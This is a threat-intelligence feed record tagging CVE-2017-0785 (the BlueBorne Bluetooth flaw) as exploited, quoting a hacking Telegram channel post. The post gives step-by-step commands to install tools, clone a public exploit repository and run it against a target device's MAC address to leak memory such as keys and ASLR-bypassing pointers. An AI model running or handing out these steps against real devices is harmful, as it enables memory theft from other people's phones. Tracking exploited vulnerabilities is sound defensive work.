{"uuid": "f6862bec-735b-4c7b-add6-07419dd7cd42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-0785", "type": "exploited", "source": "https://t.me/MajorHacker/60", "content": "BlueBorne \nPurpose only! The dangers of Bluetooth implementations: Unveiling zero day vulnerabilities and security flaws in modern Bluetooth stacks. \n\n\"Now at this point, I am wondering if Armis left this information out of the white paper intentionally, if you send more packets to the device you can dump a lot more memory, and in this memory, you will see some interesting things. They say you can find \"encryption key, address space and valuable pointers (of code and or data) that can be used to bypass ASLR while exploiting a separate memory corruption vulnerability\", so let's see what I found!\" mailinneberg.\n\nTo run, be sure to have pybluez and pwntools installed.\n\nStep 1 -\nsudo apt-get install bluetooth libbluetooth-dev\nsudo pip install pybluez\nsudo pip install pwntools\n\nStep 2 -\ngit clone https://github.com/mailinneberg/BlueBorne.git\ncd BlueBorne\nchmod 777 CVE-2017-0785.py\n\nStep 3 -\npython CVE-2017-0785.py TARGET=(Target device MAC add).", "creation_timestamp": "2019-05-02T02:37:41.000000Z"}